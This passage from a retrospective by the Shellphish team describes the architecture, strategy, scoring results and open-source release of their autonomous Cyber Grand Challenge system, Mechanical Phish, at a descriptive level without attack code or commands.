Meister + and its creators were entirely stateless. At any point, it could crash, + yet it would not kill existing jobs upon automatic restart if they were + still considered important by the creators. + +* Scriba + + An important task of the CRS was to select and submit the POVs and RBs, + respectively. Scriba looked at performance results of exploits and + patches and decided what and when to submit (for more details on the + selection strategy see Section 6 - Strategy). As mentioned previously, + after Scriba decided what and when to submit, Ambassador actually + submitted to the TI (as Ambassador is the only component allowed to + communicate externally). + +* Network Dude + + The Network Dude component received UDP traffic coming from the IDS tap + and stored it into the database via Farnsworth. Since it is required to + receive packets at line-speed, neither parsing nor analysis of the + network data was performed within Network Dude, instead, we relied + different components to process the network traffic. + +* Worker + + Worker was the executor for analysis tasks of the CRS. It wrapped tools + such as angr, Driller, Patcherex in a generic interface to be managed + easily. In fact, every Worker instance referred to an entry in a jobs + queue specifying task arguments and type. Since some of the workers had + to execute CGC DECREE binaries for functionality and performance + evaluation, we included a DECREE virtual machine running on QEMU within a + worker. + + +--[ 005.002 - Dynamic Resource Allocation + +Another advantage of our architecture design, alongside dependency +isolation and ease of deployment, was the possibility to dynamically scale +components to meet our needs. Except for the PostgreSQL database and some +internal Kubernetes services, all our components could run on any node +without limitation. + +Furthermore, when creating a job, Meister assigned it a priority based on +the component and the current game status. For example, crash-generation +jobs (Rex) were prioritized lower if an input crash was not considered +reliable, or the analysis of a de-fielded CB was considered of no +importance at all. Intuitively, all created jobs were sorted by descending +values of priority, and scheduled through the Kubernetes API until all +nodes' resources (CPU and memory) were saturated. Once all node resources +were taken by running jobs, Meister killed jobs with lower priority to +accommodate new higher priority jobs, but it did not over-provision. + + +--[ 005.003 - Fail-over + +Mechanical Phish was required to run without failure for the duration of +the CFE, an estimated 10 hours. Furthermore, no debugging sessions were +permitted and the CRS was recommended to be resistant to minor hardware +failure (or might have risked to "crash and burn"). + +To improve the reliability and resiliency of Mechanical Phish, we took +various steps. First, every component, including Ambassador, Meister, +Scriba, Network Dude, and Workers, was deployed as a Docker container. All +components were designed to be entirely stateless, allowing us to restart +them and move them across nodes if necessary. + +Although components could be terminated abruptly without any significant +consequence, some components were critical and were required to be running +for Mechanical Phish to function correctly: These were Ambassador, Network +Dude, Scriba, and Meister (crashing and recovering is acceptable for these +components). Fortunately, Kubernetes provided a way to define +always-running instances through DaemonSet and ReplicationController +resources. If an instance of such type is terminated or timed out, it is +automatically launched on another node (to prevent Kubernetes to be a +single point-of-failure, Mechanical Phish was using a highly-available +Kubernetes setup with multiple masters and virtual IP addresses for +access). + +* Database + + Naturally, the entire system cannot be completely stateless, and a single + stateful component is required, which was Farnsworth. To prevent any + failure of the node running the PostgreSQL Docker containers or the + containers themselves, we leveraged PostgreSQL's built-in master-slave + streaming replication for a resilient system. Specifically, for the CFE, + we ran 5 instances on 5 different physical nodes evenly spread across the + rack, and an additional health-checking monitoring service. The monitor + service itself was run using a ReplicationController resource. If the + master database container would have been considered dead by the monitor, + a slave instance would have been elected as the new master and a + replacement slave would have been created on a healthy node. To prevent + components from failing during database disaster recovery, they accessed + the database in a retry loop with exponential back-off. In turn, it would + have ensured that no data would have been lost during the transition from + a slave to master. + +* CGC Access Interfaces + + The CGC CFE Trials Schedule defined that specific IP addresses were + required to communicate with the CGC API. Given the distributed nature of + our CRS and the recommendation to survive failure, the IP addresses + remained the last single point of failure as specific components needed + to be run on specific physical hosts. Consequently, we used Pacemaker and + Corosync to monitor our components (Ambassador and Network Dude), and + assign the specific IP addresses as virtual IP addresses to a healthy + instance: if a node failed, the address would move to a healthy node. + + + +--[ 006 - Strategy + +---;;;;;;;-----'''''''''``' --- `' .,,ccc$$hcccccc,. `' ,;;!!!'``,;;!!' +;;;;,,.,;-------''''''' ,;;!!- .zJ$$$$$$$$$$$$$$$$$$$c,. `' ,;;!!!!' ,; + ```' -;;;!'''''- `.,.. .zJ$$$$$$$$$$$$$$$$$$$$$$$$$$c, `!!'' ,;!!' +!!- ' `,;;;;;;;;;;'''''```' ,c$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$c, ;!!'' ,; +,;;;!!!!!!!!''``.,;;;;!'`' z$$$$$$$$???"""""'.,,.`"?$$$$$$$$$$$ ``,;;!!! +;;.. --''```_..,;;! J$$$$$$??,zcd$$$$$$$$$$$$$$$$$$$$$$$$h ``'``' +```''' ,;;''``.,.,;;, ,$$$$$$F,z$$$$$$$$$$$$$$$$$$$c,`""?$$$$$h +!!!!;;;;, --`!''''''' $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$h.`"$$$$h . +`'''``.,;;;!;;;--;; zF,$$$$$$$$$$?????$$$$$$$$$$$$$?????$$r ;?$$$ $. +!;.,..,.````.,;;;; ,$P'J"$$$$$$P" .,c,,.J$$$$$$$$$"',cc,_`?h.`$$$$ $L +'``````' .,.. ,$$". $ $$$$P",c$$$$$$$$$$$$$$$$',$$$$$$$$$$ $$$$ $$c, +!!!!!!!!!!!!!''' J$',$ $.`$$P c$$$$$$$$$$$$$$$$$$,$$$$$$$$$$$ $$$$ $$$$C + `` J$ ,$P $$ ?$',$$$$???$$$$$$$$$$$$$$$??"""?$$$ <$$$ $$$$$ +c ;, z$F,$$ `$$ $ ?$" "$$$.?$$$ $$$P c??c, ?$.<$$',$$$$$F +$$h. -!> (' $" $F ,F ?$ $ F ,="?$$c,`$$F $$"z$$',$' ,$$P $h.`$ ?$$$$$r +$$$$$hc,. ``' J$ $P J$ . $$F L ",,J$$$F <$hc$$ "$L,`??????,J$$$.` z$$$$$ +$$$$$$$$$$c,'' ?F,$',$F.: $$ c$c,,,,,c,,J$$$$$$$ ?$$$c,,,c$$$$$$F. $$$$$$ +`"$$$$$$$$$$$c, $$',$$ :: $$$$$$$$F"',$$$$$$$$$$h ?$$$L;;$$$??$$$$ $$$$$$ + "?$$$$$$$$$$ $$$$$$ : .`F"$$$$$$$$$$$$""""?"""h $$$$$$$"$,J$$$$ $$$$$' + "?$$$$$$$ $$$$$$.`.` h `$$$$$$$$$$$cccc$$c,zJ$$$$$P' $$$$$P',$$$$P +$. `""?$$ $$$$$$$ ` "$c "?$$$$$$$$$$$$??$$$$$$$$" ,J$$$P",J$$$$P +.. `" ?$$$$$$h ?$$c.`?$$$$$$$$$' . <$$$$$' ,$$$" ,$$$$$" +!!>. . `$$$$$$$h . "$$$c,"$$$$$$$' `' `$$$P ,$$$' ,c$$$$$' ;! +``` `$$$$$$$c "$$$c`?$$$$$ : : $$$ ,$$P' z$$$$$$' ;!! +$hc ```' ; `$$$$$$$. ?$$c ?$$$$ .: : $$$ $$F ,J$$$$$$' ;!! +.,.. ' `$$$$$$$ "$$h`$$$$ .' ' $$$ ,$$ ,J$$$$$$' !!! +????P `$$$$$$L $$$ $$$F :.: J$$P J$F J$$$$$P ;!! +-=< ?$$."$$ `$$ ?$$' `' z$$$F $P $$$$$$' !!' +cc `$$$c`? ?$.`$$hc, cd$$F ,$' $$$$$$ ;!! + $$$$c `$$c$$$$$$$$$",c$' $$$$$$ `!! + $$$$$ `?$$$$$$$$$$$$P' $$$$$$> .. + $$$$$ `"?$$$$$$$P" $$$$$$L $$c, + !! <$$$$$ zc,`"""', <$$$$$$.`$$$$cc, + !! J$$$$P `$$$$$$$' !' $$$$$$L `$$$$$$h + ;, $$$$$L `! J$$$$$',!! $$$$$$$ `$$$$$$ + ' <$$$$$. ! $$$$$$ !! ?$$$$$$ `$$$$$ + ,$$$$$$$c `,`???? ;' c,?$$$$' `?$$$ + $$$$$$$?? `!;;;;! . `h."?$P `$$$ + ,$$$$$$$h. `''' `' `$$$P `?$ + $$$$$$$$h `!' `"' ` + `$$$$$$$$F !; ! ;, + `$$$$$$$' `!!> `! +c, ;, `?$$$$P !!> . +$F !!> `""' `!! ;!> <- + The General Strategy of Shellphish + +The Mechanical Phish was only about three months old when the final event +of the Cyber Grand Challenge took place. Like any newborn, its strategic +thought processes were not well developed and, unfortunately, the +sleep-deprived hackers of Shellphish were haphazard teachers at best. In +this section, we describe what amounted to our game strategy for the +Mechanical Phish and how the rules of the Cyber Grand Challenge, combined +with this strategy, impacted the final result. + + +* Development Strategy + + +The Shellphish CGC team was comprised completely of researchers at the UC +Santa Barbara computer security lab. Unfortunately, research labs are +extremely disorganized environments. Also unfortunately, as most of us were +graduate students, and graduate students need to do research to survive +(and eventually graduate), we were fairly limited in the amount of time +that we could devote to the CGC. For example, for the CGC Qualification +Event, we built our CRS in two and a half weeks. For the final event, we +were able to devote a bit more time: on average, each member of the team +(the size of which gradually increased from 10 to 13 over the course of the +competition) probably spent just under three months on this insanity. + +One thing that bit us is that we put off true integration of all of the +components until the last minute. This led to many last-minute performance +issues, some of which we did not sort out before the CFE. + + +* Exploitation Strategy + +Our exploitation strategy was simple: we attack as soon and as frequently +as possible. The only reason that we found to hold back was to avoid +letting a victim team steal an exploit. However, there was not enough +information in the consensus evaluation to determine whether a team did or +did not have an exploit for a given service (and attempting to recover this +fact from the network traffic was unreliable), so we decided on a "Total +War" approach. + + +* Patching Strategy + +For every not-failing RB, we submitted the patch considered as the most +likely to have a better performance score. Specifically, given the way in +which RBs were created, we ranked RBs according to the following list: +Optimized Reassembled RB, Reassembled RB, Detouring RB. This choice was +motivated by the fact that detouring is slow (as it causes cache flushes +due to its propensity to jumping to many code locations), whereas the +generated optimized RBs are fast. Of course, we could not always rely on +the reassembler (and optimizer) to produce a patch, as these backends had +some failure cases. + +For every patch submitted, the corresponding CS is marked down for a round. +Because this can be (and, in the end, was) debilitating to our score, we +evaluated many strategies with regards to patching during the months before +the CFE. We identified four potential strategies: + +- Never patch: The simplest strategy was to never patch. This has the + advantage of nullifying the chances of functionality breakages and + avoiding the downtime associated with patching. + +- Patch when exploited: The optimal strategy would be to patch as soon as + we detect that a CS was being exploited. Unfortunately, detecting when a + CS is exploited is very difficult. For example, while the consensus + evaluation does provide signals that the binaries cause, these signals do + not necessarily correlate to exploitation. Furthermore, replaying + incoming traffic to detect exploitation is non-trivial due to complex + behaviors on the part of the challenge binaries. + +- Patch after attacking: An alternative strategy is to assume that an + opponent can quickly steal our exploits, and submit a patch immediately + after such exploits are fired. In our latter analysis, we determined that + this would have been the optimal strategy, granting us first place. + +- Always patch: If working under the assumption that the majority of + challenge sets are exploited, it makes sense to always patch. + +Most teams in the Cyber Grand Challenge took this decision very seriously. +Of course, being the rag-tag group of hackers that we are, we did some +fast-and-loose calculations and made a result based on data that turned out +to be incorrect. Specifically, we assumed that a similar fraction of the +challenges would be exploited as the fraction of challenges crashed during +the CQE (about 70%). At the time, this matched up with the percentage of +sample CGC binaries, provided by DARPA during sparring partner rounds, that +we were exploiting. Running the numbers under this assumption led us to +adopt the "always patch" approach: + +1. At the second round of a challenge set's existence, we would check if we + had an exploit ready. If not, we would patch immediately, with the best + available patch (out of the three discussed above). Otherwise, we would + delay for a round so that our exploit had a chance to be run against + other teams. + +2. Once a patch was deployed, we would monitor performance feedback. + +3. If feedback slipped below a set threshold, we would revert to the + original binary and never patch again. + +In this way, we would patch *once* for every binary. As we discuss later, +this turned out to be one of the worst strategies that we could have taken. + + + +--[ 007 - Fruits of our Labors + +In early August, our creation had to fight for its life, on stage, in front +of thousands of people. The Mechanical Phish fought well and won third +place, netting us $750,000 dollars and cementing our unexpected place as +the richest CTF team in the world (with a combined winnings of 1.5 million +dollars, Shellphish is the first millionaire CTF team in history!). + +This is really cool, but it isn't the whole story. The CGC generated +enormous amounts of data, and to truly understand what happened in the +final event, we need to delve into it. In this section, we'll talk +specifically regarding what happened, who achieved what, and how the CGC +Final Event played out. + +For reference throughout this section, the final scores of the CGC Final +Event were: + + +--------------+------------------+---------+ + | Team | CRS Name | Points | + +--------------+------------------+---------+ + | ForAllSecure | Mayhem | 270,042 | + | TECHx | Xandra | 262,036 | + | Shellphish | Mechanical Phish | 254,452 | + | DeepRed | Rubeus | 251,759 | + | CodeJitsu | Galactica | 247,534 | + | CSDS | Jima | 246,437 | + | Disekt | Crspy | 236,248 | + +--------------+------------------+---------+ + +The attentive reader will notice that the score of the Mechanical Phish is +the only one that is a palindrome. + + +--[ 007.001 - Bugs + +The CGC was the first time that autonomous systems faced each other in a +no-humans-allowed competition. As such, all of the Cyber Reasoning Systems +likely faced some amount of bugs during the CFE. The most visible was +Mayhem's, which resulted in the system being off-line for most of the +second half of the game (although, as we discuss later in this section, +that might not have hurt the system as much as one would think). Our +system was no different. In looking through the results, we identified a +number of bugs that the Mechanical Phish ran into during the CFE: + +* Multi-CB pipeline assertions + +We used fuzzing to identify crashes and POV Fuzzing to fuzz those crashes +into POVs for challenge sets comprising of multiple binaries. +Unfortunately, an accidental assert statement placed in the POV Fuzzing +code caused it to opt out of any tasks involving multi-CB challenge sets, +disabling our multi-CB exploitation capability. + +* Network traffic synchronization + +Due to a bug, the component that scheduled tasks to synchronize and analyze +network traffic was set to download *all* recorded network traffic every +minute. The volume of this traffic quickly caused it to exceed scheduling +timeouts, and Mechanical Phish only analyzed network traffic for the first +15 rounds of the game. + +* RB submission race condition + +Due to a race condition between the component that determined what patches +to submit and the component that actually submitted them, we had several +instances where we submitted different patched binaries across different +rounds, causing multiple rounds of lost uptime. + +* Scheduling issues + +Throughout the CFE, Mechanical Phish identified exploitable crashes in over +40 binaries. However, only 15 exploits were generated. Part, but not all, +of this was due to the multi-CB pipeline assertions. It seems that the +rest was due to scheduling issues that we have not yet been able to +identify. + +* Slow task spawning + +Our configuration of Kubernetes was unable to spawn tasks quickly enough to +keep up with the job queue. Luckily, we identified this bug a few days +before the CFE and put in some workarounds, though we did not have time to +fix the root cause. This bug caused us to under-utilize our +infrastructure. + + +--[ 007.002 - Pwning Kings + +Over the course of the CGC Final Event, the Mechanical Phish pwned the most +challenges out of the competitors and stole the most flags. This was +incredible to see, and is an achievement that we are extremely proud of. +Furthermore, the Mechanical Phish stole the most flags even when taking +into account only the first 49 rounds, to allow for the fact that Mayhem +submitted its last flag on round 49. + +We've collected the results in a helpful chart, with the teams sorted by +the total amount of flags that the teams captured throughout the game. + ++--------------+-------------------------------+--------------------------+ +| Team | Flags Captured (first 49/all) | CSes Pwned (first 49/all)| ++--------------+-------------------------------+--------------------------+ +| Shellphish | 206 / 402 | 6 / 15 | +| CodeJitsu | 59 / 392 | 3 / 9 | +| DeepRed | 154 / 265 | 3 / 6 | +| TECHx | 66 / 214 | 2 / 4 | +| Disekt | 101 / 210 | 5 / 6 | +| ForAllSecure | 185 / 187 | 10 / 11 | +| CSDS | 20 / 22 | 1 / 2 | ++--------------+-------------------------------+--------------------------+ + +Interestingly, Mayhem exploited an enormous amount of binaries before it +went down, but the Mechanical Phish still achieved a higher exploitation +score in the rounds that Mayhem was alive. One possibility is that the +exploits launched by the Mechanical Phish were more reliable than those of +Mayhem. However, its raw exploitation power should not be underestimated: +within 49 rounds, before going off the grid, Mayhem managed to exploit 10 +binaries. While the Mechanical Phish surpassed it over the entire game, +this is still quite impressive. + + +--[ 007.003 - Patching Kings + +To understand how effective our patches were, we calculated the number of +flags lost (and the number of CSes on which flags were lost) throughout the +game, both for the first 49 rounds (in which Mayhem was online) and for the +entire game. As expected, because the Mechanical Phish patched every +binary, we found that it was the least-exploited CRS. Specifically, it only +leaked flags on 12 challenge sets. The runner-up in this sense (the +second-place team, TECHx), leaked flags on 14 binaries. + +Interestingly, TECHx beat us on the total number of flags leaked. This +makes sense -- they likely had some analysis to identify *when* they were +being exploited, and patch only then. And, likely, their patches were more +effective than our own, leading to a lower number of total flags leaked! + +The results, sorted by the number of compromised challenges, are: + ++--------------+-------------------------------+--------------------------+ +| Team | Defended CS-Rounds (49/all) | CSes Compromised (49/*) | ++--------------+-------------------------------+--------------------------+ +| Shellphish | 29 / 68 | 7 / 12 | +| TECHx | 27 / 61 | 7 / 14 | +| DeepRed | 32 / 87 | 6 / 15 | +| ForAllSecure | 54 / 160 | 7 / 16 | +| CodeJitsu | 61 / 104 | 9 / 16 | +| Disekt | 66 / 127 | 9 / 17 | +| CSDS | 108 / 189 | 9 / 18 | ++--------------+-------------------------------+--------------------------+ + + +--[ 007.004 - Patching Effectiveness + +Before the CFE, we tested our patches against the dataset of all CQE +binaries released until that point, compiled with many different +compilation flags. On this dataset, our chance of breaking a binary, or +lowering performance to below 85% (the guesstimated threshold at which we +would pull the binary back) was under 2%, and we decided to abandon patch +performance/functionality testing. On the actual CFE dataset, we fared +worse. + +The CFE had 82 challenge sets. For these 82 challenge sets, we successfully +generated patches for 78. Of these 78, we had to pull back 10 because the +patch broke the binary and 7 because the patch lowered the performance of +the binary below acceptable levels. This was considerably higher than +expected. Furthermore, due to a race condition between the patch submission +logic and the component that retrieves the game state, we did end up with +situations where we would submit *multiple* patches, thinking that the +round had not ended whereas, in reality, it had. In total, we made 107 RCB +submissions throughout the game. This was the second-highest amount, with +only CodeJitsu submitting more (108). + +Because very few challenges were exploited during the CFE, this was +unequivocally the wrong choice. In total, we lost around 17000 points +during the "downtime" rounds after the patch submissions alone. + + +--[ 007.005 - Alternate History Case Studies + +Hindsight is 20/20. Even though we know, now, that we made the wrong choice +regarding our patching strategy, it's still interesting to see what "could +have been". In this section, we do that. To better understand the impact of +our strategy decisions, we compute scores for several simulated CGC rounds +where the Mechanical Phish undertook different strategies, and see what +would have happened. + +It's very important to point out that this is all fantasy. *Every* team can +look back and consider things that they might have done differently. The +most obvious one is Mayhem: had they avoided crashing, they might have +absolutely dominated the competition, rather than relaxedly coasting to +victory. However, every other team has other "what if" moments. We explore +ours here purely out of curiosity. + +* Mechanical Phish that never patched + +To calculate our score in the absence of patching, we recalculated CFE +scores, assuming that, any time an exploit would be launched on a CS +against *any* team, the exploit would be run against us during that round +and all subsequent rounds of that CS being in play. With this calculation, +our score would be 267,065, which is 12,613 points higher than the patch +strategy that we did choose and would put us in second place by a margin of +over 5,000 points. + +The prize for second place was $1,000,000. Patching at all cost us +$250,000! + +* Mechanical Phish that patched after attacking + +Similar to the previous strategy, we calculated our score with a patch +strategy that would delay patches until *after* we launched exploits on the +corresponding CS. For the patches that would have been submitted, we used +the same feedback that we received during the CFE itself. With this +calculation, our score would be 271,506, which is 17,054 points higher than +the patch strategy that we chose and would have put us in first place by a +margin of over 1,500 points. + +The prize for first place was $2,000,000. Patching stupidly cost us +$1,250,000 and quite a bit of glory! + +* Mechanical Phish that didn't do crap + +We were curious: did we really have to push so hard and trade so much +sanity away over the months leading up to the CGC? How would a team that +did *nothing* do? That is, if a team connected and then ceased to play, +would they fare better or worse than the other players? We ran a similar +analysis to the "Never patch" strategy previously (i.e., we counted a CS as +exploited for all rounds after its first exploitation against any teams), +but this time removed any POV-provided points. In the CFE, this "Team NOP" +would have scored 255,678 points, barely *beating* Shellphish and placing +3rd in the CGC. + +To be fair, this score calculation does not take into account the fact that +teams might have withheld exploits because all opponents were patched +against them. However, ForAllSecure patched only 10 binaries, so it does +not seem likely that many exploits were held back due to the presence of +patches. + +One way of looking at this is that we could have simply enjoyed life for a +year, shown up to the CGC, and walked away with $750,000. Another way of +looking at this is that, despite us following the worst possible strategy +in regards to patching, the technical aspects of our CRS were good enough +to compensate and keep us in the top three positions! + + +--[ 007.006 - Scoring Difficulties + +Similarly to this being the first time that autonomous systems +compete against each other in a no-humans-allowed match, this was also the +first time that such a match was *hosted*. The organizing team was up +against an astonishing amount of challenges, from hardware to software to +politics, and they pulled off an amazing event. + +However, as in any complex event, some issues are bound to arise. In this +case, the problem was that measuring program performance is hard. We found +this out while creating our CRS, and DARPA experienced this difficulty +during the final event. Specifically, we noticed two anomalies in the +scoring data: slight disparities in the initial scoring of challenge sets, +and performance "cross-talk" between services. + +* Initial CS Scoring + +Patches can only be fielded on round 3 (after being submitted on round 2) +of a binary being deployed. However we noticed that our availability scores +were lower than our opponents, even on the *first* round of a challenge, +when they could not yet be patched. In principle, these should all be the +same, as a team has *no* way to influence this performance score. We +calculated the average of the first-round CS availability scores, presented +in the table below. The scores vary. The difference between the +"luckiest" team, regarding their first-round CS score, and the "unluckiest" +team was 1.6 percentage points. Unfortunately, Shellphish was that +unluckiest team. + +Since the availability score was used as a multiplier for a team's total +score, if the "luckiest" and "unluckiest" had their "luck" swapped, this +would compensate for a total score difference of 3.2%. That is a bigger +ratio than the difference between second and third place (2.9%), third and +fourth place (1.1%), fourth and fifth place (1.7%), and fifth and sixth +place (0.4%). The winner (Mayhem) could not have been unseated by these +perturbations, but the rest of the playing field could have looked rather +different. + ++--------------+----------------------------------+ +| Team | Average First Round Availability | ++--------------+----------------------------------+ +| CSDS | 0.9985 | +| ForAllSecure | 0.9978 | +| Disekt | 0.9975 | +| TECHx | 0.9973 | +| CodeJitsu | 0.9971 | +| DeepRed | 0.9917 | +| Shellphish | 0.9824 | ++--------------+----------------------------------+ + +* Scoring Cross-talk + +We also noticed that performance measurements of one challenge seem to +influence others. Specifically, when we patched the binary NRFIN_00066 on +round 39, we saw the performance of *all* of our other, previously-patched, +binaries drop drastically for rounds 40 and 41. This caused us to pull back +patches for *all* of our patched binaries, suffering the resulting downtime +and decrease in security. + +Anecdotally, we spoke to two other teams, DeepRed and CodeJitsu, that were +affected by such scoring cross-talk issues. + + + +--[ 008 - Warez + +We strongly believe in contributing back to the community. Shortly after +qualifying for the Cyber Grand Challenge, we open-sourced our binary +analysis engine, angr. Likewise, after the CGC final event, we have +released our entire Cyber Reasoning System. The Mechanical Phish is open +source, and we hope that others will learn from it and improve it with us. + +Of course, the fact that we directly benefit from open-source software +makes it quite easy for us to support open-source software. Specifically, +the Mechanical Phish would not exist without amazing work done by a large +number of developers throughout the years. We would like to acknowledge the +non-obvious ones (i.e., of course we are all thankful for Linux and vim) +here: + +* AFL (lcamtuf.coredump.cx/afl) - AFL was used as the fuzzer of every + single competitor in the Cyber Grand Challenge, including us. We all owe + lcamtuf a great debt. +* PyPy (pypy.org) - PyPy JITed our crappy Python code, often increasing + runtime by a factor of *5*. +* VEX (valgrind.org) - VEX, Valgrind's Intermediate Representation of + binary code, provided an excellent base on which to build angr, our + binary analysis engine. +* Z3 (github.com/Z3Prover/z3) - angr uses Z3 as its underlying constraint + solver, allowing us to synthesize inputs to drive execution down specific + paths. +* Boolector (fmv.jku.at/boolector) - The POVs produced by the Mechanical + Phish required complex reasoning about the relation between input and + output data. To reduce implementation effort, we wanted to use a + constraint solver to handle these relationships. Because Z3 is too huge + and complicated to include in a POV, we ported Boolector to the CGC + platform and included it in every POV the Mechanical Phish threw. +* QEMU (qemu.org) - The heavy analyses that angr carries out makes it + considerably slower than qemu, so we used qemu when we needed + lightweight, but fast analyses (such as dynamic tracing). +* Unicorn Engine (www.unicorn-engine.org) - angr uses Unicorn Engine to + speed up its heavyweight analyses. Without Unicorn Engine, the number of + exploits that the Mechanical Phish found would have undoubtedly been + lower. +* Capstone Engine (www.capstone-engine.org) - We used Capstone Engine to + augment VEX's analysis of x86, in cases when VEX did not provide enough + details. This improved angr's CFG recovery, making our patching more + reliable. +* Docker (docker.io) - The individual pieces of our infrastructure ran in + Docker containers, making the components of the Mechanical Phish + well-compartmentalized and easily upgradeable. +* Kubernetes (kubernetes.io) - The distribution of docker containers across + our cluster, and the load-balancing and failover of resources, was + handled by kubernetes. In our final setup, the Mechanical Phish was so + resilient that it could probably continue to function in some form even + if the rack was hit with a shotgun blast. +* Peewee (https://github.com/coleifer/peewee) - After an initial false + start with a handcrafted HTTP API, we used Peewee as an ORM to our + database. +* PostgreSQL (www.postgresql.org) - All of the data that the Mechanical + Phish dealt with, from the binaries to the testcases to the metadata + about crashes and exploits, was stored in a ridiculously-tuned and + absurdly replicated Postgres database, ensuring speed and resilience. + +As for the Mechanical Phish, this release is pretty huge, involving many +components. This section serves as a place to collect them all for your +reference. We split them into several categories: + +--[ 008.001 - The angr Binary Analysis System + +For completeness, we include the repositories of the angr project, which we +open sourced after the CQE. However, we released several additional +repositories after the CFE, so we list the whole project here. + +* Claripy + +Claripy is our data-model abstraction layer, allowing us to reason about +data symbolically, concretely, or in exotic domains such as VSA. It is +available at https://github.com/angr/claripy. + +* CLE. + +CLE is our binary loader, with support for many different binary formats. +It is available at https://github.com/angr/cle. + +* PyVEX. + +PyVEX provides a Python interface to the VEX intermediate representation, +allowing angr to support multiple architectures. It is available at +https://github.com/angr/pyvex. + +* SimuVEX. + +SimuVEX is our state model, allowing us to handle requirements of different +analyses. It is available at https://github.com/angr/simuvex. + +* angr. + +The full-program analysis layer, along with the user-facing API, lives in +the angr repository. It is available at https://github.com/angr/angr. + +* Tracer. + +This is a collection of code to assist with concolic tracing in angr. It is +available at https://github.com/angr/tracer. + +* Fidget. + +During the CQE, we used a patching method, called Fidget, that resized and +rearranged stack frames to prevent vulnerabilities. It is available at +https://github.com/angr/fidget. + +* Function identifier. + +We implemented testcase-based function identification, available at +https://github.com/angr/identifier. + +* angrop. + +Our ROP compiler, allowing us to exploit complex vulnerabilities, is +available at https://github.com/salls/angrop. + + +--[ 008.002 - Standalone Exploitation and Patching Tools + +Some of the software developed for the CRS can be used outside of the +context of autonomous security competitions. As such, we have collected it +together in a separate place. + +* Fuzzer. + +We created a programmatic Python interface to AFL to allow us to use AFL as +a module, within or outside of the CRS. It is available at +https://github.com/shellphish/fuzzer. + +* Driller. + +Our symbolic-assisted fuzzer, which we used as the crash discovery +component of the CRS, is available at +https://github.com/shellphish/driller. + +* Rex. + +The automatic exploitation system of the CRS (and usable as a standalone +tool) is available at https://github.com/shellphish/rex. + +* Patcherex. + +Our automatic patching engine, which can also be used standalone, is +available at https://github.com/shellphish/patcherex. + + +--[ 008.003 - The Mechanical Phish Itself + +We developed enormous amounts of code to create one of the world's first +autonomous security analysis systems. We gathered the code that is specific +to the Mechanical Phish under the mechaphish github namespace. + + +* Meister. + +The core scheduling component for analysis tasks is at +https://github.com/mechaphish/meister. + +* Ambassador. + +The component that interacted with the CGC TI infrastructure is at +https://github.com/mechaphish/ambassador. + +* Scriba. + +The component that makes decisions on which POVs and RBs to submit is +available at https://github.com/mechaphish/scriba. + +* Docker workers. + +Most tasks were run inside docker containers. The glue code that launched +these tasks available at https://github.com/mechaphish/worker. + +* VM workers. + +Some tasks, such as final POV testing, was done in a virtual machine +running DECREE. The scaffolding to do this is available at +https://github.com/mechaphish/vm-workers. + +* Farnsworth. + +We used a central database as a data store, and used an ORM to access it. +The ORM models are available at https://github.com/mechaphish/farnsworth. + +* POVSim. + +We ran our POVs in a simulator before testing them on the CGC VM (as the +latter is a more expensive process). The simulator is available at +https://github.com/mechaphish/povsim. + +* CGRex. + +Used only during the CQE, we developed a targeted patching approach that +prevents binaries from crashing. It is available at +https://github.com/mechaphish/cgrex. + +* Compilerex. + +To aid in the compilation of CGC POVs, we collected a set of templates and +scripts, available at https://github.com/mechaphish/compilerex. + +* Boolector. + +We ported the Boolector SMT solver to the CGC platform so that we could +include it in our POVs. It is available at +https://github.com/mechaphish/cgc-boolector. + +* Setup. + +Our scripts for deploying the CRS are at +https://github.com/mechaphish/setup. + +* Network dude. + +The CRS component that retrieves network traffic from the TI server is at +https://github.com/mechaphish/network_dude. + +* Patch performance tester. + +Though it was not ultimately used in the CFE, because performance testing +is a very hard problem, our performance tester is at +https://github.com/mechaphish/patch_performance. + +* Virtual competition. + +We extended the provided mock API of the central server to be able to more +thoroughly exercise Mechanical Phish. Our extensions are available at +https://github.com/mechaphish/virtual-competitions. + +* Colorguard. + +Our Type-2 exploit approach, which uses an embedded constraint solver to +recover flag data, is available at +https://github.com/mechaphish/colorguard. + +* MultiAFL. + +We created a port of AFL that supports analyzing multi-CB challenge sets. +It is available at https://github.com/mechaphish/multiafl. + +* Simulator. + +To help plan our strategy, we wrote a simulation of the CGC. It is +available at https://github.com/mechaphish/simulator. + +* POV Fuzzing. + +In addition to Rex, we used a backup strategy of "POV Fuzzing", where a +crashing input would be fuzzed to determine relationships that could be +used to create a POV. These fuzzers are available at +https://github.com/mechaphish/pov_fuzzing. + +* QEMU CGC port. + +We ported QEMU to work on DECREE binaries. This port is available at +https://github.com/mechaphish/qemu-cgc. + + + +--[ 009 - Looking Forward + +Shellphish is a dynamic team, and we are always looking for the next +challenge. What is next? Even we might not know, but we can speculate in +this section! + + +* Limitations of the Mechanical Phish + +The Mechanical Phish is a glorified research prototype, and significant +engineering work is needed to bring it to a point where it is usable in the +real world. Mostly, this takes the form of implementing the environment +model of operating systems other than DECREE. For example, the Mechanical +Phish can currently analyze, exploit, and patch Linux binaries, but only if +they stick to a very limited number of system calls. + +We open-sourced the Mechanical Phish in the hopes that work like this can +live on after the CGC, and it is our sincere hope that the CRS continues to +evolve. + + +* Cyber Grand Challenge 2? + +As soon as the Cyber Grand Challenge ended, there were discussions about +whether or not there would be a CGC2. Generally, DARPA tries to push +fundamental advances: they did the self-driving Grand Challenge more than +once years, but this seems to be because no teams won it the first time. +The fact that they have not done a self-driving Grand Challenge since +implies that DARPA is not in the business of running these huge +competitions just for the heck of it: they are trying to push research +forward. + +In that sense, it would surprise us if there was a CGC2, on DECREE OS, with +the same format as it exists now. For such a game to happen, the community +would probably have to organize it themselves. With the reduced barrier to +entry (in the form of an open-sourced Mechanical Phish), such a competition +could be pretty interesting. Maybe after some more post-CGC recovery, we'll +look into it! + +Of course, we can also sit back and see what ground-breaking concept DARPA +comes up with for another Grand Challenge. Maybe there'll be hacking in +that one as well. + + +* Shellphish Projects + +The Mechanical Phish and angr are not Shellphish's only endeavors. We are +also very active in CTFs, and one thing to come out of this is the +development of various resources to help newbies to CTF. For example, we +have put together a "toolset" bundle to help get people started in security +with common security tools (github.com/zardus/ctf-tools), and, in the +middle of the CGC insanity, ran a series of hack meetings in the university +to teach people, by example, how to perform heap meta-data attacks +(github.com/shellphish/how2heap). We're continuing down that road, in fact. +Monitor our github for our next big thing! +` + + +--[ 010 - References + +[Driller16] Driller: Augmenting Fuzzing Through Selective Symbolic +Execution +Nick Stephens, John Grosen, 